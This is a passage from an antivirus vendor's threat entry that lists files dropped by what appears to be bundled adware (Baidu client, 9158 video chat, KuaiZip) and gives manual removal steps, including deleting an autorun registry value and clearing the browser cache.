    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\main[1].ico (14676 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\CABY0VJT.htm (3170 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\Opendownloadernewxml[1].htm (899 bytes)
    %Program Files%\9158ktv\DownLoad\9158chat2_ktv097_28.exe.tmp (109915 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\Downloaderconfig[1].htm (948 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\1[1].swf (46445 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\CAPOM59R.htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\CAEZC16H.htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\CAS9GHCZ.htm (1 bytes)
    C:\temp.icon (14676 bytes)
    %Documents and Settings%\%current user%\Desktop\百度.lnk (1 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\百度\卸载百度.lnk (1 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\百度.lnk (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\百度.lnk (1 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\百度\百度.lnk (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\settings\user_setting.db (24 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db-journal (512 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\stock.pb (2 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CheckerExe.exe (163689 bytes)
    %Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130892497314787500.dat (311 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db (284596 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db.bak (10 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db-journal (5454 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\novel.pb (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\settings\default_setting.db (24 bytes)
    %System%\drivers\KuaiZipDrive.sys (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\ga[1].xml (636 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\49_2[1].gif (2281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\getinfo[1].htm (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\68_r_579[1].gif (49345 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\3_3[1].gif (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\Activity[1].ashx (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\31_s_21610[1].bmp (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\32_r_1710[1].gif (1969 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\39_a_579[1].gif (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\61_s_122010[1].png (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\log_close[1].bmp (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\log_min[1].bmp (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\8_a_22214[1].gif (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\filter[1].zip (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\1_t_52312[1].gif (1417 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\31_t_21610[1].gif (21953 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\makefriend6.9[1].xml (1444 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\38_a_12913[1].gif (337 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\15_2[1].gif (1417 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\8_r_22214[1].gif (27121 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\logbg[1].bmp (160113 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\get_list[1].htm (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\filter[1].zip (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\38_t_112316[1].gif (22009 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\10_1[1].gif (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\32_t_21411[1].gif (18121 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\31_a_12417[1].gif (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\67_t_72516[1].gif (25313 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\serverlist1[1].htm (3172 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\9[1].gif (1969 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\67_a_12613[1].gif (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\Fruit[1].xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\DynamicEffects[1].zip (2057837 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\60_t_112310[1].gif (26633 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\54[1].bmp (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\60_s_122010[1].png (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\9_3[1].gif (649 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\3_4[1].gif (8905 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\8_t_22214[1].gif (29849 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\39_r_579[1].gif (27633 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\28_s_72017[1].png (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\28_t_72017[1].gif (961 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\1_r_579[1].gif (22009 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\15_s_122010[1].png (337 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\20_t_12216[1].gif (961 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\itemconfig[1].xml (6532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\68_s_122010[1].png (337 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\info[1].htm (7332 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\3_2[1].gif (19969 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\serverlist1[1].htm (3172 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\31_r_12417[1].gif (15529 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\Banner[1].xml (551 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\67_r_12613[1].gif (4153 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\32_a_11117[1].gif (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\15_3[1].gif (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\getad4[2].htm (326 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\1_s_121915[1].png (337 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\54_t_122013[1].gif (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\39_s_122010[1].png (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\38_r_12913[1].gif (25729 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\39_t_112310[1].gif (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\1_a_579[1].gif (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\29_s_122010[1].png (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\2_s_121915[1].png (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\8_s_122010[1].png (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\68_1[1].gif (2281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\10_s_122010[1].png (337 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\10_3[1].gif (269 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\16_s_122010[1].png (337 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\10_2[1].gif (64721 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\20_s_112517[1].bmp (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\9_2[1].gif (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\32_s_21411[1].png (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\list[1].htm (121 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\67_s_122010[1].png (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\38_s_122010[1].png (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\29_5[1].gif (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\return.bmp (4 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓƵ\жÔØ 9158¶àÈËÊÓƵ.lnk (713 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\install_step2.bmp (22192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\finish.bmp (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\install.bmp (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\loading2.bmp (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\close.bmp (824 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\loading1.bmp (784 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓƵ\9158¶àÈËÊÓƵ.lnk (705 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\checkbox1.bmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\SkinBtn.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\install_step3.bmp (22192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\custom.bmp (4 bytes)
    %Documents and Settings%\%current user%\Desktop\9158¶àÈËÊÓƵ.lnk (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\install_step1.bmp (22192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\checkbox2.bmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx5.tmp (923429 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "BaiduClient" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe -noclient"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now